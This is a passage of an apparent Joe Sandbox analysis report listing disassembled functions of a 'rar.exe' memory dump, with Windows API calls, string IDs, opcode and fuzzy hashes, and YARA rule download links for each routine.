                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4141327611-0
                                                                                                                                                                                                                                      • Opcode ID: e7bd9680fa6b4193e921ea7abc60155107c03bf2766982dd05110af1441b6c30
                                                                                                                                                                                                                                      • Instruction ID: c6dc6158072afe15b62c10a94ee19dcd37eac3cdd45fd5d47673f993301dad84
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e7bd9680fa6b4193e921ea7abc60155107c03bf2766982dd05110af1441b6c30
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 90414B22E0D78246FF759E519140379B6E1EF80F90F5481F1DA8A8BAD9DF2CE8418B42
                                                                                                                                                                                                                                      Function 00007FF69A3FD048 Relevance: 6.1, APIs: 4, Instructions: 77fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,00007FF69A3E86CB,?,?,?,00007FF69A3EA5CB,?,?,00000000,?,?,00000040,?,?,00007FF69A3E2DF9), ref: 00007FF69A3FD09D
                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,00007FF69A3E86CB,?,?,?,00007FF69A3EA5CB,?,?,00000000,?,?,00000040,?,?,00007FF69A3E2DF9), ref: 00007FF69A3FD0E5
                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,00007FF69A3E86CB,?,?,?,00007FF69A3EA5CB,?,?,00000000,?,?,00000040,?,?,00007FF69A3E2DF9), ref: 00007FF69A3FD114
                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,00007FF69A3E86CB,?,?,?,00007FF69A3EA5CB,?,?,00000000,?,?,00000040,?,?,00007FF69A3E2DF9), ref: 00007FF69A3FD15C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                                                                                      • Opcode ID: 3c41f03ffe9be2f80d80ab2a91f405bd887f89bc1d7d9ea25aa0d2314948d83b
                                                                                                                                                                                                                                      • Instruction ID: 291bc9b58ea90e8ea4c22f40fc3503241ce6fc29b60f6ebd127a7ed4332fd6df
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3c41f03ffe9be2f80d80ab2a91f405bd887f89bc1d7d9ea25aa0d2314948d83b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71318D32618B4586E7708F11F5547AAB7E0F789BA8F505368EAAD87BC8CF3DD0048B40
                                                                                                                                                                                                                                      Function 00007FF69A42B4EC Relevance: 6.0, APIs: 4, Instructions: 44threadCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CurrentPriorityThread$ClassProcess
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1171435874-0
                                                                                                                                                                                                                                      • Opcode ID: bb35a308c9672c43725447ff3ecbbf89940673d79f69deb8a20185b15c97b697
                                                                                                                                                                                                                                      • Instruction ID: 7da631ef9c0eda57cd25a24bc4d276525446e47972a11f7d0172352d10deb42c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bb35a308c9672c43725447ff3ecbbf89940673d79f69deb8a20185b15c97b697
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E8110976E186428AE6748F15A48827C72E1FF84F48F6050F5CB0ADB695DF2DB88B8705
                                                                                                                                                                                                                                      Function 00007FF69A445630 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLast$abort
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1447195878-0
                                                                                                                                                                                                                                      • Opcode ID: bc6db4589d12c74431344df6db0fda3963e5f3476a1a0d6bb2a5a407689805e6
                                                                                                                                                                                                                                      • Instruction ID: c2e00364cbf1269bcef079302adeb314a1347c564133c569eac0ef1141178af5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bc6db4589d12c74431344df6db0fda3963e5f3476a1a0d6bb2a5a407689805e6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B2011024B0964247FE78AB31A65623871D1CF88F80F1405F8E91E87BD6EE2CF8418741
                                                                                                                                                                                                                                      Function 00007FF69A4458A4 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 245COMMONLIBRARYCODE
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                      • String ID: gfffffff
                                                                                                                                                                                                                                      • API String ID: 3215553584-1523873471
                                                                                                                                                                                                                                      • Opcode ID: 21452402729b0f04a42bea99b9d48ecd324c6ba459a3d9785fd7d0df1cc262de
                                                                                                                                                                                                                                      • Instruction ID: defbfff4334c5e4c968b05ea87e18f75bcda18de360283a74e6f4b1aae6cacf6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 21452402729b0f04a42bea99b9d48ecd324c6ba459a3d9785fd7d0df1cc262de
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F391F462B097CA46EF258F2591803A87BE5EB65FD0F0481B1CB9D877D5DE2CE915C302
                                                                                                                                                                                                                                      Function 00007FF69A41CFCF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 225COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00007FF69A42B6D0: Sleep.KERNEL32(?,?,?,?,00007FF69A3FCBED,?,00000000,?,00007FF69A427A8C), ref: 00007FF69A42B730
                                                                                                                                                                                                                                      • new.LIBCMT ref: 00007FF69A41CFD9
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Sleep
                                                                                                                                                                                                                                      • String ID: rar$rev
                                                                                                                                                                                                                                      • API String ID: 3472027048-2145959568
                                                                                                                                                                                                                                      • Opcode ID: b4a3dbcb548f429c64c95219bff2b126912035a4d4646d0106d3222159d6f56a
                                                                                                                                                                                                                                      • Instruction ID: 273ebe96543b26183070cff0f3cb2039700ed795ac4287f0dffc9339640f2a23
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b4a3dbcb548f429c64c95219bff2b126912035a4d4646d0106d3222159d6f56a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 00A1BCA2A0869286EB30DB20C9542BD73E5FF65F88F5540F1DA5D876D6EF2CE550C340
                                                                                                                                                                                                                                      Function 00007FF69A43F7CC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 169COMMONLIBRARYCODE
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                      • String ID: *
                                                                                                                                                                                                                                      • API String ID: 3215553584-163128923
                                                                                                                                                                                                                                      • Opcode ID: 16a705be2b1e487b59333a8e93db6455a755c474a96de4fc0b7d69b7c81f417b
                                                                                                                                                                                                                                      • Instruction ID: 40399556b451f82d3c5b9c59db70c47042dbe914399942284e0609630c7a8df5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 16a705be2b1e487b59333a8e93db6455a755c474a96de4fc0b7d69b7c81f417b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5E717F7291861286E7788F298A4103D3BE0FF55F48F2411F6DA8BCA398DF79E881D751
                                                                                                                                                                                                                                      Function 00007FF69A445CD4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMONLIBRARYCODE
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                      • String ID: e+000$gfff
                                                                                                                                                                                                                                      • API String ID: 3215553584-3030954782
                                                                                                                                                                                                                                      • Opcode ID: a7106781bdf1546bde54527bf858c9e03adeffff05cd77f62067aea497a9d42c
                                                                                                                                                                                                                                      • Instruction ID: 1bf658c63cf1d67e94cbd417a96369247f26fc211349306fa000269652b67ecf
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a7106781bdf1546bde54527bf858c9e03adeffff05cd77f62067aea497a9d42c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5C51F3A2B187C246EB758F3599413697AD1EB41F90F08D2F1C6ACCBBD6DE2CD8448701
                                                                                                                                                                                                                                      Function 00007FF69A414534 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(?,?,?,00000800,?,?,00000000,00007FF69A40475B,?,00000000,?,?,00007FF69A404620,?,00000000,?), ref: 00007FF69A414633
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CurrentDirectory
                                                                                                                                                                                                                                      • String ID: UNC$\\?\
                                                                                                                                                                                                                                      • API String ID: 1611563598-253988292
                                                                                                                                                                                                                                      • Opcode ID: da028c110e4e0ee969c3eaba738cc076e51dd9ec006f0672d54c2a85376dd233
                                                                                                                                                                                                                                      • Instruction ID: 8391c5fe64298be948dd1a5676af78d92d5e5b79ad76dde327ac0425399df735
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: da028c110e4e0ee969c3eaba738cc076e51dd9ec006f0672d54c2a85376dd233
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6741C491A0868240E930AB52E5111B933D1EF66FD8F8185F1DEADC76D6EE3CE555C340
                                                                                                                                                                                                                                      Function 00007FF69A443B0C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMONLIBRARYCODE
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe
                                                                                                                                                                                                                                      • API String ID: 3307058713-1550257945
                                                                                                                                                                                                                                      • Opcode ID: c5c98bd9bcb7567b946254e1cd77aa550a51c4497f1b66c7ef7d78e94eebfc81
                                                                                                                                                                                                                                      • Instruction ID: 4bb1d4bee5f31322b5c228cbd4b06291f76daa189055d991265b264acac2f159
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c5c98bd9bcb7567b946254e1cd77aa550a51c4497f1b66c7ef7d78e94eebfc81
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1C418A36A08B9286EB74DF25A8410B8B7E4EB44F94B5640F5ED0E87B95DF3CE4818740
                                                                                                                                                                                                                                      Function 00007FF69A427C38 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AttributesFilewcsstr
                                                                                                                                                                                                                                      • String ID: System Volume Information\
                                                                                                                                                                                                                                      • API String ID: 1592324571-4227249723
                                                                                                                                                                                                                                      • Opcode ID: 4db18abc006475e63bde04fe0f8edb9794334f288998beee5a1eb1867efadb0f
